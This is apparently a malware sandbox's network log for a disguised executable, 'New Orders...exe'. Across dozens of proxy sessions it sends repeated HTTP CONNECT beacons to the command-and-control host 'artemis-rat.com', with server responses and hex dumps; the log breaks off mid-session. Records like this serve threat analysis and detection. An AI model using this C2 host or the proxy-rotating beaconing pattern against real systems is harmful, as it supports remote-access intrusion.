                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        929192.168.2.952840185.162.229.215807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.357882977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.512429953 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        930192.168.2.952594201.39.229.148807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.358453989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.476845980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.070306063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        931192.168.2.952698212.31.100.13841537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.358728886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        932192.168.2.952685218.91.158.23073027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.359150887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        933192.168.2.950250103.129.3.246837672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.359349012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.439048052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.539060116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        934192.168.2.952692182.61.38.114827672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.360342026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.132658958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.648498058 CET295INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 150
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        935192.168.2.95275272.210.221.19741457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.361969948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        936192.168.2.952869104.16.107.142807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.362737894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.517091036 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        937192.168.2.952875104.19.233.117807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.364008904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.518297911 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        938192.168.2.95281567.43.236.1858797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.365602016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.601320982 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        939192.168.2.95282864.227.4.9080007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.365602016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        940192.168.2.952878104.17.62.87807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.368314981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.522888899 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        941192.168.2.952880172.67.35.15807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.368495941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.523192883 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        942192.168.2.952886104.20.205.191807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.369834900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.524262905 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        943192.168.2.952889104.18.254.76807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.370021105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.524382114 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        944192.168.2.95277298.162.25.4316547672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.371424913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        945192.168.2.9527053.122.84.9931287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.372781038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.677186012 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        946192.168.2.95030351.79.87.144225007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.373049021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.439027071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        947192.168.2.952707211.222.252.18781977672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.373302937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        948192.168.2.952912172.67.182.153807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.377490997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.531811953 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        949192.168.2.952720121.128.194.154807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.377563953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        950192.168.2.952918104.20.225.218807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.378158092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.532267094 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        951192.168.2.952745147.75.34.86807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.382256985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.683449984 CET65INHTTP/1.1 200 Connection Established
                                                                                        Proxy-Agent: Zscaler/6.3
                                                                                        Mar 11, 2024 16:16:43.686867952 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ef 20 5b 11 ac 9c 9e 73 9b dc 64 41 fc 75 2a a5 f1 c9 62 0b f5 ba f7 33 e5 4a 34 aa 33 2b 0d 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: lhe [sdAu*b3J43+*,+0/$#('=<5/artemis-rat.com#c*SKWfX({lf;~t4O#QD;mZpTn


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        952192.168.2.95275558.75.126.23541457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.383377075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
